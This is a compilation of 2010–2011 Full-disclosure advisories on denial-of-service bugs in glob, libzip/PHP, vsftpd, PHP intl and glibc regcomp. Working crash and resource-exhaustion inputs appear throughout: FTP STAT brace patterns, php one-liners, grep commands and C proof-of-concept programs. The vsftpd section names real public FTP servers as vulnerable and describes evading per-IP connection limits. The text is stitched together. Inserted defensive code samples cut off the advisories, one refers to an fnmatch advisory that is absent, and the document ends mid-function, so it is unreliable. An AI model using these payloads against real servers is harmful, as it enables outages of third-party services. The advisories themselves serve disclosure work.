However, SIZE_MAX and INT_MAX don't protect us from memory exhaustion. The real problem here is the uncontrolled malloc(3) call. globextend() will be executed a lot of times, and we should reduce the calls to glob0() and globexp1(). Therefore a new limit has been created, limiting the 'braces' used in 'pattern'.
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gen/glob.c.diff?r1=text&tr1=1.27&r2=text&tr2=1.29

If we don't reduce this call:

-globextend()/netbsd--
static int
globextend(const Char *path, glob_t *pglob, size_t *limit)
{
	char **pathv;
	size_t i, newsize, len;
	char *copy;
	const Char *p;

	_DIAGASSERT(path != NULL);
	_DIAGASSERT(pglob != NULL);

	newsize = sizeof(*pathv) * (2 + pglob->gl_pathc + pglob->gl_offs);
	pathv = pglob->gl_pathv ? realloc(pglob->gl_pathv, newsize) :
	    malloc(newsize);  <== UNSECURE CALL
...
-globextend()/netbsd--

	newsize = sizeof(*pathv) * (2 + pglob->gl_pathc + pglob->gl_offs);

malloc(3) tries to allocate (4*pglob->gl_pathc) bytes.
-PoC-
USER anonymous
PASS b...@bla.bla
STAT {a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}
-PoC-

As a result we get:

Jan 19 04:49:17 127 /netbsd: UVM: pid 615 (ftpd), uid 1003 killed: out of swap

Many servers are still vulnerable to the above vulnerability and CVE-2010-4754, CVE-2010-4755, CVE-2010-4756, CVE-2010-2632. Servers like ftp.sun.com and ftp.sony.com seem to still be affected.

--- 2. References ---

http://securityreason.com/achievement_securityalert/89
http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2010-008.txt.asc
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html
http://support.avaya.com/css/P8/documents/10012789
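GLOB_LIMIT only acts once glob(3) is already expanding the pattern, and the advisory's point is that the number of globextend() calls is driven by the brace groups in the pattern, not by anything on the filesystem. As an added example (not NetBSD's, OpenBSD's or any libc's code), a server that hands user-supplied patterns to glob(3) can bound the expansion before the call: the counter below walks the pattern and computes the worst-case number of strings that GLOB_BRACE expansion will produce, summing alternatives inside a group and multiplying sequential groups, so the {a,b} x 66 pattern from the PoC is rejected without ever touching glob(). brace_expansions(), pattern_is_acceptable(), BRACE_CAP and BRACE_LIMIT are constructed names and values, not libc constants.

```c
#include <stdint.h>
#include <string.h>

/* Saturation point for the count (constructed; only needs to be larger than
 * any limit a server would set) and the constructed acceptance threshold. */
#define BRACE_CAP   ((uint64_t)1 << 40)
#define BRACE_LIMIT 1024

/* Count expansions of the pattern text starting at *pp. At depth 0 the
 * walk ends at the NUL; inside a group it also stops at ',' or '}' so the
 * caller can handle the alternative boundary. *pp is advanced to the stop
 * character. A backslash escapes the next character, as GLOB_BRACE does
 * without GLOB_NOESCAPE. Unbalanced braces are counted as if they were
 * groups, which over-estimates (glob() treats them literally), so the check
 * stays conservative. */
static uint64_t count_seq(const char **pp, int depth, uint64_t cap)
{
    const char *p = *pp;
    uint64_t total = 1;

    for (;;) {
        char c = *p;
        if (c == '\0' || (depth > 0 && (c == ',' || c == '}')))
            break;
        if (c == '\\' && p[1] != '\0') {    /* escaped character: literal */
            p += 2;
            continue;
        }
        if (c == '{') {
            /* A group contributes the sum of its alternatives, each of
             * which may itself contain nested groups. */
            uint64_t sum = 0;
            p++;
            for (;;) {
                uint64_t alt = count_seq(&p, depth + 1, cap);
                sum = (alt > cap - sum) ? cap : sum + alt;
                if (*p != ',')
                    break;
                p++;
            }
            if (*p == '}')
                p++;
            /* Sequential groups multiply: {a,b}{a,b} yields 4 strings. */
            total = (total > cap / sum) ? cap : total * sum;
            continue;
        }
        p++;
    }
    *pp = p;
    return total;
}

/* Worst-case number of strings GLOB_BRACE expansion produces for pattern,
 * saturating at BRACE_CAP. */
uint64_t brace_expansions(const char *pattern)
{
    return count_seq(&pattern, 0, BRACE_CAP);
}

/* 1 if the pattern may be passed to glob(3), 0 if it should be refused. */
int pattern_is_acceptable(const char *pattern)
{
    return brace_expansions(pattern) < BRACE_LIMIT ? 1 : 0;
}
```

This check is independent of, and complements, GLOB_LIMIT: the pre-check refuses patterns whose expansion is large by construction, while GLOB_LIMIT still caps the matches a reasonable-looking pattern happens to produce on the actual directory tree.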
[Full-disclosure] libzip 0.9.3 _zip_name_locate NULL Pointer Dereference (incl PHP 5.3.5)
[ libzip 0.9.3 _zip_name_locate NULL Pointer Dereference (incl PHP 5.3.5) ]

Author: Maksymilian Arciemowicz
http://securityreason.com/
http://cxib.net/

Date:
- Dis.: 03.01.2011
- Pub.: 18.03.2011

CVE: CVE-2011-0421
CERT: VU#325039

Affected Software:
- libzip 0.9.3
- PHP 5.3.5 (fixed 5.3.6)

Original URL: http://securityreason.com/achievement_securityalert/96

--- 0. Description ---

libzip is a C library for reading, creating, and modifying zip archives. Files can be added from data buffers, files, or compressed data copied directly from other zip archives. Changes made without closing the archive can be reverted. The API is documented by man pages.

--- 1. Description ---

libzip allows remote and local attackers to cause a Denial of Service (NULL Pointer Dereference) if the ZIP_FL_UNCHANGED flag is set.

-lib/zip_name_locate.c---
int
_zip_name_locate(struct zip *za, const char *fname, int flags,
		 struct zip_error *error)
{
    int (*cmp)(const char *, const char *);
    const char *fn, *p;
    int i, n;

    if (fname == NULL) {
	_zip_error_set(error, ZIP_ER_INVAL, 0);
	return -1;
    }

    cmp = (flags & ZIP_FL_NOCASE) ? strcasecmp : strcmp;

    n = (flags & ZIP_FL_UNCHANGED) ? za->cdir->nentry : za->nentry;  <= CRASH HERE
-lib/zip_name_locate.c---

For an empty zip file and the ZIP_FL_UNCHANGED flag, libzip should crash. Currently for PHP, we estimate the security impact only as a remote DoS, so the risk is low.

Projects using libzip: KDE Utilities (4.x branch), MySQL Workbench, ckmame, fuse-zip, php zip extension, Endeavour2, FreeDink

A better analysis based on the PHP ZipArchive code is below.

--- 2. PHP 5.3.5 ZipArchive() ---

PoC1:
php -r '$nx=new ZipArchive();$nx->open("/dev/null");$nx->locateName("a",ZIPARCHIVE::FL_UNCHANGED);'

PoC2:
php -r '$nx=new ZipArchive();$nx->open("empty.zip");$nx->statName("a",ZIPARCHIVE::FL_UNCHANGED);'

Let's see:

-php_zip.c-
...
static ZIPARCHIVE_METHOD(locateName)
{
...
	ZIP_FROM_OBJECT(intern, this);

	if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|l",
			&name, &name_len, &flags) == FAILURE) {
		return;
	}
...
	idx = (long)zip_name_locate(intern, (const char *)name, flags);  <=== CRASH IN THIS FUNCTION
...
-php_zip.c-

And let's see:

-zip_name_locate.c-
ZIP_EXTERN(int)
zip_name_locate(struct zip *za, const char *fname, int flags)
{
    return _zip_name_locate(za, fname, flags, &za->error);
}

int
_zip_name_locate(struct zip *za, const char *fname, int flags,
		 struct zip_error *error)
{
    int (*cmp)(const char *, const char *);
    const char *fn, *p;
    int i, n;

    if (fname == NULL) {
	_zip_error_set(error, ZIP_ER_INVAL, 0);
	return -1;
    }

    cmp = (flags & ZIP_FL_NOCASE) ? strcmpi : strcmp;

    n = (flags & ZIP_FL_UNCHANGED) ? za->cdir->nentry : za->nentry;  <=== CRASH HERE IF ZIPARCHIVE::FL_UNCHANGED

    for (i=0; i<n; i++) {
...
-zip_name_locate.c-

65	    n = (flags & ZIP_FL_UNCHANGED) ? za->cdir->nentry : za->nentry;
(gdb) print za->cdir->nentry
Cannot access memory at address 0x8
(gdb) print za->nentry
$21 = 0

because

(gdb) x/i $rip
=> 0x6407cc <_zip_name_locate+236>:	mov    0x8(%rax),%eax
(gdb) x/i $rax
0x0:	Cannot access memory at address 0x0
(gdb) x/i $eax

Call to zip_name_locate:

(gdb) n
1877		idx = (long)zip_name_locate(intern, (const char *)name, flags);
(gdb) print intern
$24 = (struct zip *) 0x118d580
(gdb) x/x intern
0x118d580:	0x0118d220
(gdb) x/40x intern
0x118d580:	0x0118d220	0x00000000	0x0118d340	0x00000000
0x118d590:	0x00000000	0x00000000	0x00000000	0x00000000
0x118d5a0:	0x00000000	0x00000000	0x00000000	0x00000000
0x118d5b0:	0x00000000	0x00000000	0x00000000	0x00000000
0x118d5c0:	0x00000000	0x00000000	0x00000000	0x00000000
0x118d5d0:	0x00000000	0x00000000	0x00000000	0x00000000
0x118d5e0:	0x00000000	0x00000000	0x00020a21	0x00000000
0x118d5f0:	0x00000000	0x00000000	0x00000000	0x00000000
0x118d600:	0x00000000	0x00000000	0x00000000	0x00000000
0x118d610:	0x00000000	0x00000000	0x00000000	0x00000000

Next, PoC2:

$nx=new ZipArchive();$nx->open("empty.zip");$nx->statName("9223372036854775808","9223372036854775807");

Program received signal SIGSEGV, Segmentation fault.
0x006407cc in _zip_name_locate (za=0x118d520, fname=0x11693f0 "9223372036854775808", flags=32767, error=0xdac0)
    at /build/buildd/php5-5.3.3/ext/zip/lib/zip_name_locate.c:65
65	in /build/buildd/php5-5.3.3
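The gdb session shows the shape of the bug: za->cdir is NULL for an archive opened from an empty file, and _zip_name_locate() dereferences it as soon as ZIP_FL_UNCHANGED asks for the original central directory. As an added example (not libzip's code and not part of the advisory), here is a cut-down lookup over the same two entry tables with the missing check in place. struct archive, struct cdir, FL_UNCHANGED, FL_NOCASE and archive_name_locate() are constructed stand-ins for libzip's struct zip, ZIP_FL_UNCHANGED, ZIP_FL_NOCASE and _zip_name_locate().

```c
#include <stddef.h>
#include <string.h>
#include <strings.h>

/* Constructed flag values standing in for ZIP_FL_NOCASE / ZIP_FL_UNCHANGED. */
#define FL_NOCASE    1
#define FL_UNCHANGED 2

struct cdir {                 /* central directory as read from the file */
    int nentry;
    const char **names;
};

struct archive {
    struct cdir *cdir;        /* NULL for an empty or just-created archive */
    int nentry;               /* current entries, including unsaved changes */
    const char **names;
};

/* Returns the index of fname, or -1 when it is absent or the request is
 * invalid. With FL_UNCHANGED the original directory is consulted; an
 * archive opened from an empty file has no central directory, which is
 * exactly the state the advisory's crash comes from. */
int archive_name_locate(const struct archive *za, const char *fname, int flags)
{
    int (*cmp)(const char *, const char *);
    const char **names;
    int n, i;

    if (za == NULL || fname == NULL)
        return -1;

    cmp = (flags & FL_NOCASE) ? strcasecmp : strcmp;

    if (flags & FL_UNCHANGED) {
        if (za->cdir == NULL)          /* the check the original lacks */
            return -1;
        n = za->cdir->nentry;
        names = za->cdir->names;
    } else {
        n = za->nentry;
        names = za->names;
    }

    for (i = 0; i < n; i++) {
        if (names[i] != NULL && cmp(names[i], fname) == 0)
            return i;
    }
    return -1;
}
```

Returning -1 ("not found") for the empty-archive case matches what the caller already has to handle for any name that is not present, so no new error path is needed at the PHP layer.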
[Full-disclosure] vsftpd 2.3.2 remote denial-of-service
[ vsftpd 2.3.2 remote denial-of-service ]

Author: Maksymilian Arciemowicz
http://securityreason.com/
http://cxib.net/

Date:
- Dis.: 23.12.2010
- Pub.: 01.03.2011

CVE: CVE-2011-0762
CERT: VU#590604
Fix: vsftpd 2.3.4 (15.02.2011)

Affected Software (verified):
- vsftpd 2.3.2 (NetBSD 5.1)
- vsftpd 2.3.0 (Ubuntu 10.10)

Affected Servers (19.02.2011):
- ftp.gnu.org (2.0.6)
- ftp.kernel.org (2.2.2)
- ftpgen.wip4.adobe.com (2.3.2)
- ftp.oracle.com (2.0.5)
- ftp.freebsd.org (2.2.0)
- more more more...

Original URL: http://securityreason.com/achievement_securityalert/95

--- 0. Description ---

vsftpd is a GPL licensed FTP server for UNIX systems, including Linux. It is secure and extremely fast. It is stable. Don't take my word for it, though. Below, we will see evidence supporting all three assertions. We will also see a list of a few important sites which are happily using vsftpd. This demonstrates vsftpd is a mature and trusted solution.

--- 1. vsftpd 2.3.2 remote denial-of-service ---

As we can read in the vsftpd file "ls.c"...

---
...
 * parsing and handling. There is broad potential for any given fnmatch(3)
 * implementation to be buggy.
 *
 * Currently supported pattern(s):
 * - any number of wildcards, "*" or "?"
 * - {,} syntax (not nested)
...
---

That's true, but anyone who has changed the BSD ftpd daemon to vsftpd to protect against CVE-2010-2632 (glob(3) resource exhaustion) is in danger. Any code with huge complexity could allow a denial of service if an affected system received a vulnerable pattern. This bug allows disabling a wide range of servers. To designate vulnerable servers, we have to use a pattern with medium complexity.

-Example affected server---
cx@cx64:~$ telnet ftp.gnu.org 21
Trying 140.186.70.20...
Connected to ftp.gnu.org.
Escape character is '^]'.
220 GNU FTP server ready.
USER anonymous
PASS a...@cadabra.abw
STAT {{*},}
...
230 Login successful.
230 Already logged in.
213-Status follows:
-Example affected server---

Execution time may have a wide range depending on the length of the pattern:

empty     2388 97.3  0.0  37980  1352 ?        R    Dec23 222:42 /usr/sbin/vsftpd

222m and counting... so any next {{*},Recursion} will increment the complexity.

Let's see what is wrong and where. In vsftpd the main problem exists in ls.c.

-ls.c--
int
vsf_filename_passes_filter(const struct mystr* p_filename_str,
                           const struct mystr* p_filter_str)
{
...
    else if (last_token == '{')
    {
      struct str_locate_result end_brace =
        str_locate_char(&filter_remain_str, '}');
      must_match_at_current_pos = 1;
      if (end_brace.found)
      {
        str_split_char(&filter_remain_str, &temp_str, '}');
        str_copy(&brace_list_str, &filter_remain_str);
        str_copy(&filter_remain_str, &temp_str);
        str_split_char(&brace_list_str, &temp_str, ',');
        while (!str_isempty(&brace_list_str))
        {
          str_copy(&new_filter_str, &brace_list_str);
          str_append_str(&new_filter_str, &filter_remain_str);
          if (vsf_filename_passes_filter(&name_remain_str, &new_filter_str))  <= LIMIT THIS CALL
          {
            ret = 1;
...
-ls.c--

Code:

          if (vsf_filename_passes_filter(&name_remain_str, &new_filter_str))  <= LIMIT THIS CALL

This call should be limited, and in version 2.3.4 it has been fixed.

A simple way to show the growth in computing power...

(1*2*3*4*...*count(vsf_filename_passes_filter complexity)) == count(vsf_filename_passes_filter complexity)!
Compare two patterns and see the difference between:

STAT {{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{.}}

and add the next {*,...}:

STAT {{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{.}}}

and in the end, compare:

STAT {{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{.}}}]}}}

However, in vsftpd the command length is allowed up to 4096 bytes. So it's no problem to create a request with a huge complexity.

To bypass max_per_ip, use an ISP with a dynamic IP. Disconnect and connect (example for a bt mobile phone):

cx@cx64:~$ hciconfig hci0 down
cx@cx64:~$ hciconfig hci0 up

and connect again.

---PoC
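Both the fnmatch(3) advisory above and this vsftpd one come down to the same shape: a matcher that recurses once per '*' position or per brace alternative, with nothing to stop it when a pattern is built to make the search tree explode. As an added example (not NetBSD's fnmatch.c, not APR's apr_fnmatch.c and not vsftpd's ls.c), the small matcher below supports '*', '?' and a non-nested {a,b} list, recurses in the same places the two vulnerable functions do, and carries the recursion budget the NetBSD fix introduces: every level decrements it and, when it reaches zero, the call returns a distinct "gave up" result instead of continuing. MAX_RECURSION is the 64 from the advisory; MATCH_OK, MATCH_NOMATCH, MATCH_NORES (the analogue of FNM_NORES), MAX_PATTERN, matchx(), match_brace() and bounded_match() are constructed names.

```c
#include <stdio.h>
#include <string.h>

#define MATCH_OK        0
#define MATCH_NOMATCH   1
#define MATCH_NORES    (-1)   /* budget exhausted: analogue of FNM_NORES */
#define MAX_RECURSION  64     /* the limit the NetBSD fix sets */
#define MAX_PATTERN   512     /* constructed bound on a spliced pattern */

static int matchx(const char *pattern, const char *string, size_t recursion);

/* pattern points just past a '{'. Each comma-separated alternative is
 * spliced in front of the text after the closing '}' and matched again,
 * which is the recursive call vsftpd's ls.c makes for every alternative. */
static int match_brace(const char *pattern, const char *string, size_t recursion)
{
    const char *close = strchr(pattern, '}');
    const char *alt = pattern;
    char tmp[MAX_PATTERN];

    if (close == NULL)
        return MATCH_NOMATCH;

    for (;;) {
        const char *end = alt;
        while (end < close && *end != ',')
            end++;
        int n = snprintf(tmp, sizeof tmp, "%.*s%s", (int)(end - alt), alt, close + 1);
        if (n < 0 || (size_t)n >= sizeof tmp)
            return MATCH_NORES;           /* refuse over-long patterns */
        int r = matchx(tmp, string, recursion);
        if (r != MATCH_NOMATCH)
            return r;                     /* matched, or budget exhausted */
        if (end == close)
            return MATCH_NOMATCH;
        alt = end + 1;
    }
}

static int matchx(const char *pattern, const char *string, size_t recursion)
{
    /* The NetBSD fix: each level consumes one unit of budget; when it is
     * gone, give up instead of searching further. */
    if (recursion-- == 0)
        return MATCH_NORES;

    for (;;) {
        char c = *pattern++;
        switch (c) {
        case '\0':
            return *string == '\0' ? MATCH_OK : MATCH_NOMATCH;
        case '?':
            if (*string == '\0')
                return MATCH_NOMATCH;
            string++;
            break;
        case '{':
            return match_brace(pattern, string, recursion);
        case '*':
            while (*pattern == '*')       /* collapse multiple stars */
                pattern++;
            if (*pattern == '\0')
                return MATCH_OK;          /* trailing star matches the rest */
            /* General case: try the rest of the pattern at every offset.
             * Unbounded, this is the exponential path of the advisory; the
             * budget passed down makes each branch give up early. */
            while (*string != '\0') {
                int r = matchx(pattern, string, recursion);
                if (r != MATCH_NOMATCH)
                    return r;
                string++;
            }
            return MATCH_NOMATCH;
        default:
            if (c != *string)
                return MATCH_NOMATCH;
            string++;
            break;
        }
    }
}

/* Entry point, the analogue of fnmatch(): 0 on match, 1 on no match,
 * -1 when the recursion budget ran out before a decision was reached. */
int bounded_match(const char *pattern, const char *string)
{
    return matchx(pattern, string, MAX_RECURSION);
}
```

A caller such as a directory listing routine treats MATCH_NORES like a bad pattern (report an error to the client) rather than like a no-match; the point is that the decision comes back after at most 64 nested calls regardless of how the pattern is built, which is what the advisory asks of the fix. The depth limit bounds nesting, not total work: a pattern with few stars against a very long string can still do a lot of backtracking, which is why a server should also cap pattern and string length.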
Re: [Full-disclosure] glibc and alloca()
Chris Evans gmail.com> writes:

> Linux distribution might still have vulnerabilities in this area.

proftpd uses the GNU libc implementation
http://www.proftpd.org/docs/RELEASE_NOTES-1.3.4rc1

+ Updated fnmatch implementation, using glibc-2.9 version.

Version 1.3.3d may contain this issue

--
Best Regards
pub   4096R/D6E5B530 2010-09-19
uid                  Maksymilian Arciemowicz (cx)
sub   4096R/58BA663C 2010-09-19
[Full-disclosure] PHP 5.3.5 grapheme_extract() NULL Pointer Dereference
[ PHP 5.3.5 grapheme_extract() NULL Pointer Dereference ]

Author: Maksymilian Arciemowicz
http://securityreason.com/
http://cxib.net/

Date:
- Dis.: 09.12.2010
- Pub.: 17.02.2011

CVE: CVE-2011-0420
CERT: VU#210829

Affected Software:
- PHP 5.3.5

Fixed: SVN

Original URL: http://securityreason.com/achievement_securityalert/94

--- 0. Description ---

The Internationalization extension (further referred to as Intl) is a wrapper for the ICU library, enabling PHP programmers to perform UCA-conformant collation and date/time/number/currency formatting in their scripts.

grapheme_extract: Function to extract a sequence of default grapheme clusters from a text buffer, which must be encoded in UTF-8.

--- 1. PoC for grapheme_extract() ---

grapheme_extract('a',-1);

Change the length of the first parameter to change rip.

--- 2. grapheme_extract() NULL Pointer Dereference ---

As we can see in grapheme_extract(str,size):

-grapheme_extract()--
...
	if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "sl|llz", (char **)&str, &str_len, &size, &extract_type, &lstart, &next) == FAILURE) {  <=== str='a' and size='-1'
...
	/* if the string is all ASCII up to size+1 - or str_len whichever is first - then we are done.
		(size + 1 because the size-th character might be the beginning of a grapheme cluster) */

	if ( -1 != grapheme_ascii_check(pstr, size + 1 < str_len ? size + 1 : str_len ) ) {  <=== ( size=-1+1=0 )
		long nsize = ( size < str_len ? size : str_len );  <=== nsize = -1
		if ( NULL != next ) {
			ZVAL_LONG(next, start+nsize);
		}
		RETURN_STRINGL(((char *)pstr), nsize, 1);  <=== CRASH POINT
	}
...
-grapheme_extract()--

If we call grapheme_ascii_check(pstr,0), where:

-grapheme_ascii_check()--
/* {{{ grapheme_ascii_check: ASCII check */
int grapheme_ascii_check(const unsigned char *day, int32_t len)  <== len=0
{
	int ret_len = len;
	while ( len-- ) {
	if ( *day++ > 0x7f )
		return -1;
	}

	return ret_len;  <=== return 0
}
-grapheme_ascii_check()--

then we get (int)0 as the result, and

	long nsize = ( size < str_len ? size : str_len );

will be -1. Therefore,

	RETURN_STRINGL(((char *)pstr), nsize, 1);

gives a NULL pointer dereference here. By changing the length of the first parameter of grapheme_extract(), we will also change rip in memcpy(3).

(gdb) r -r 'grapheme_extract('a',-1);'
...
(gdb) x/i $rip
=> 0x75511d99 :	mov    %rax,(%rdi)
(gdb) x/x $rax
0xf9891857a6e70f70:	Cannot access memory at address 0xf9891857a6e70f70
(gdb) x/x $rdi
0x11b2000:	Cannot access memory at address 0x11b2000

(gdb) r -r 'grapheme_extract('aaa',-1);'
...
(gdb) x/i $rip
=> 0x75511d77 :	mov    0x18(%rsi),%r10
(gdb) x/x $rsi
0x11b1fe8:	0x

--- 3. Fix ---

CVS
http://svn.php.net/viewvc?view=revision&revision=306449

--- 4. Greets ---

Pierre, Stas, sp3x, infospec

--- 5. Contact ---

Author: Maksymilian Arciemowicz [ SecurityReason.com ]
Email:
- cxib {a\./t]securityreason[d=t} com
GPG:
- http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com/
http://cxib.net/

--
Best Regards
pub   4096R/D6E5B530 2010-09-19
uid                  Maksymilian Arciemowicz (cx)
sub   4096R/58BA663C 2010-09-19
Re: [Full-disclosure] GNU libc/regcomp(3) Multiple Vulnerabilities
On 01/11/2011 04:33 PM, halfdog wrote:
>
> Nice find, but not the first one, look at:
>
> https://bugs.launchpad.net/ubuntu/+source/glibc/+bug/343894
>
> I just reported the issue to ubuntu so see how their bug tracking team
> was performing on an issue where a standard byte-array-fuzzer just
> needed 2secs to find it. I wanted to know, if they could detect a
> misclassified issue (was not reported as security bug) and bring it to a
> fix. I would have bet, that they would be faster than you, but it seems
> that you made the race. What I learned from the exercise (see bug
> report date March 2009), is that the ubuntu launchpad platform is an
> invaluable source of exploits when used together with google mining.

I agree with you, but in my opinion the ubuntu tracking team has nothing to do here. The main problem exists in the GNU libc code, so this team should fix the problem. Just compare regcomp(3)/BSD and regcomp(3)/linux. In my opinion the GNU libc implementation is the worst in terms of safety.

Probably the vulnerability in glob(3) (CVE-2010-2632) can be used for resource exhaustion in the GNU inetutils ftp server.
--
Best Regards
pub   4096R/D6E5B530 2010-09-19
uid                  Maksymilian Arciemowicz (cx)
sub   4096R/58BA663C 2010-09-19
[Full-disclosure] GNU libc/regcomp(3) Multiple Vulnerabilities
[ GNU libc/regcomp(3) Multiple Vulnerabilities ]

Author: Maksymilian Arciemowicz
http://securityreason.com/
http://cxib.net/

Date:
- Dis.: 01.10.2010
- Pub.: 07.01.2011

CERT: VU#912279
CVE: CVE-2010-4051 CVE-2010-4052

Affected (tested):
- Ubuntu 10.10
- Slackware 13
- Gentoo 18.10.2010
- FreeBSD 8.1 (grep(1))
- NetBSD 5.0.2 (grep(1))

Original URL: http://securityreason.com/achievement_securityalert/93
Exploit for proftpd: http://cxib.net/stuff/proftpd.gnu.c

--- 0. Description ---

The GNU C library is used as the C library in the GNU system and most systems with the Linux kernel.

# define RE_DUP_MAX (0x7fff)

regcomp() is used to compile a regular expression into a form that is suitable for subsequent regexec() searches.

--- 1. RE_DUP_MAX overflow ---

The main problem exists in the regcomp(3) function of the GNU libc implementation. Let's try to understand it.

---
int
regcomp (preg, pattern, cflags)
    regex_t *__restrict preg;
    const char *__restrict pattern;
    int cflags;
{
---

If we use '{', the token type will be OP_OPEN_DUP_NUM.

---
/* This function parse repetition operators like "*", "+", "{1,3}" etc.  */

static bin_tree_t *
parse_dup_op (bin_tree_t *elem, re_string_t *regexp, re_dfa_t *dfa,
              re_token_t *token, reg_syntax_t syntax, reg_errcode_t *err)
{
  bin_tree_t *tree = NULL, *old_tree = NULL;
  int i, start, end, start_idx = re_string_cur_idx (regexp);
  re_token_t start_token = *token;

  if (token->type == OP_OPEN_DUP_NUM)
    {
      end = 0;
      start = fetch_number (regexp, token, syntax);   <= CONVERT VALUE
---

Let's see fetch_number =>

---
static int
fetch_number (re_string_t *input, re_token_t *token, reg_syntax_t syntax)
{
  int num = -1;
  unsigned char c;
  while (1)
    {
      fetch_token (token, input, syntax);
      c = token->opr.c;
      if (BE (token->type == END_OF_RE, 0))
        return -2;
      if (token->type == OP_CLOSE_DUP_NUM || c == ',')
        break;
      num = ((token->type != CHARACTER || c < '0' || '9' < c || num == -2)
             ? -2 : ((num == -1) ? c - '0' : num * 10 + c - '0'));
      num = (num > RE_DUP_MAX) ? -2 : num;
    }
  return num;
}
---

Now see regex.h to know what value RE_DUP_MAX has:

---
/* Maximum number of duplicates an interval can allow.  Some systems
   (erroneously) define this in other header files, but we want our
   value, so remove any previous define.  */
# ifdef RE_DUP_MAX
#  undef RE_DUP_MAX
# endif
/* If sizeof(int) == 2, then ((1 << 15) - 1) overflows.  */
# define RE_DUP_MAX (0x7fff)
#endif
---

calc_eclosure_iter() will call calc_eclosure_iter() at match time, and crash in malloc(3). Simple recursion. So we can't use a value bigger than 0x7fff in {n,}. regcomp(3) should return ERROR if we use the '{' token more than one time.

There are many attack vectors.

grep(1):

c...@cx64:~$ ls |grep -E ".*{10,}{10,}{10,}{10,}{10,}"
Segmentation fault

pgrep(1):

c...@cx64:~$ pgrep ".*{10,}{10,}{10,}{10,}{10,}"
Segmentation fault

bregex from bacula-director-common:

c...@cx64:~$ bregex -f glob-0day.c
Enter regex pattern: .*{10,}{10,}{10,}{10,}{10,}
Segmentation fault

whatis(1):

c...@cx64:~$ whatis -r ".*{10,}{10,}{10,}{10,}{10,}"
Segmentation fault

and more, like proftpd.

Simple crash for CVE-2010-4051:

(gdb) x/i $rip
=> 0x77ad3ea2:  mov    %eax,0x50(%rsp)
(gdb) x/i $eax
   0x2:  Cannot access memory at address 0x2
(gdb) x/i $rsp
   0x7f5fef90:  Cannot access memory at address 0x7f5fef90
(gdb) x/i 0x50($rsp)
   Cannot access memory at address 0x7f5fef08

#0  0x77ad3ea2 in ?? () from /lib/libc.so.6
#1  0x77ad538e in malloc () from /lib/libc.so.6
#2  0x77b17d9b in ?? () from /lib/libc.so.6
#3  0x77b17f0b in ?? () from /lib/libc.so.6
#4  0x77b17f0b in ?? () from /lib/libc.so.6
#5  0x77b17f0b in ?? () from /lib/libc.so.6
#6  0x77b17f0b in ?? () from /lib/libc.so.6
#7  0x77b17f0b in ?? () from /lib/libc.so.6
...

--- PoC1 ---
#include <regex.h>

int main(){
        regex_t preg;
//      char fmt[]=".*{10,}{10,}{10,}{10,}";      // CVE-2010-4052
        char fmt[]=".*{10,}{10,}{10,}{10,}{10,}"; // CVE-2010-4051
        regcomp (&preg, fmt, REG_EXTENDED);
        return 0;
}
--- PoC1 ---

--- 2. Stack Exhaustion ---

This issue may also be used for Denial of Service by stack exhaustion:

# ls |grep -E ".*{10,}{10,}{11,}"

--- PoC2 ---
#include <regex.h>

int main () {
        regex_t preg;
        char fmt[]=".*{10,}{10,}{10,}{10,}";      // CVE-2010-4052
//      char fmt[]=".*{10,}{10,}{10,}{10,}{10,}"; // CVE-2010-4051
        regcomp (&preg, fmt, REG_EXTENDED);
        return 0;
}
--- PoC2 ---

Such a pattern may lead to allocating a large memory area, or a large execution time. As we can read in vsftpd/HACKING

---
- do
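Programs such as grep(1), pgrep(1) and proftpd hand the pattern above to regcomp(3) unvalidated. As an added example (not part of the advisory and not glibc's code), here is a small pre-screen that refuses a repetition operator applied directly to another one, the shape of the ".*{10,}{10,}..." patterns, before regcomp(3) ever sees it; has_stacked_quantifier() and screen_and_compile() are names chosen for this example.

```c
#ifndef _XOPEN_SOURCE
#define _XOPEN_SOURCE 700
#endif
#include <regex.h>
#include <stddef.h>
#include <string.h>

/* Pre-screen a user-supplied POSIX ERE (example code, not glibc's).
 * Returns 1 if a repetition operator ('*', '+', '?' or an interval
 * "{m,n}") is applied directly to another repetition operator, which is
 * the pattern shape that drives regcomp(3) into deep recursion, and 0
 * otherwise. Escaped characters and bracket expressions are skipped so
 * that "\{" and "[{}]" are treated as the literals they are. */
int has_stacked_quantifier(const char *pat)
{
    size_t i = 0, n = strlen(pat);
    int prev_quant = 0;                 /* previous token was a quantifier */

    while (i < n) {
        char c = pat[i];
        if (c == '\\') {                /* escape: the next byte is literal */
            i += (i + 1 < n) ? 2 : 1;
            prev_quant = 0;
            continue;
        }
        if (c == '[') {                 /* bracket expression: skip to ']' */
            size_t j = i + 1;
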